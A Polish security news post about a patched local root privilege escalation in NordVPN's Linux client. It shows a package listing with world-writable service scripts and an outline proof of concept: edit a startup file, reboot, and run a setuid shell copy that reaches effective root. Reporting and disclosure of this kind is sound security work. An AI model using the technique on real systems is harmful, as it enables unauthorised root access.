-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

NordVPN załatał podatność w swoim kliencie (Debian, potencjalnie inne dystrybucje Linuksa), umożliwiającą lokalną eskalację uprawnień do roota

29 sierpnia 2022, 13:28 | W biegu | 0 komentarzy

Szczegóły zostały opublikowane niedawno, chociaż podatność została załatana już jakiś czas temu.

Jako PoC wystarczyłby w zasadzie ten listing:

root@debian:~# dpkg -c /var/cache/apt/archives/nordvpn_3.10.0-1_amd64.deb
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./var/
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./var/lib/
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./var/lib/nordvpn/
-rw-rw-rw- 0/0 4973 2021-04-07 10:15 ./var/lib/nordvpn/icon.svg
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./etc/
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./etc/init.d/
-rwxrwxrwx 0/0 2442 2021-04-07 10:15 ./etc/init.d/nordvpn
-rwxr-xr-x 0/0 3135944 2021-05-31 11:44 ./var/lib/nordvpn/openvpn
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./usr/
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./usr/lib/
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./usr/lib/systemd/
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./usr/lib/systemd/system/
-rw-rw-rw- 0/0 368 2021-04-07 10:15 ./usr/lib/systemd/system/nordvpnd.service
-rw-rw-rw- 0/0 229 2021-04-07 10:15 ./usr/lib/systemd/system/nordvpnd.socket
drwxr-xr-x 0/0 0 2021-05-31 11:45 ./usr/lib/tmpfiles.d/
-rw-rw-rw- 0/0 32 2021-04-07 10:15 ./usr/lib/tmpfiles.d/nordvpn.conf

Wprawne oko wychwyci problem z uprawnieniami – każdy lokalny użytkownik ma prawa zapisu do pewnych skryptów startujących usługę! A że usługa startuje z uprawnieniami roota, to pełny PoC polega na modyfikacji jednego z plików, poczekanie na reboot systemu (i start usługi) i voila – są uprawnienia roota (szczegóły w opisie buga):

$ ls -l /tmp
$ /tmp/evilbash -p
evilbash-5.0# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),998(nordvpn)

~ms


Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz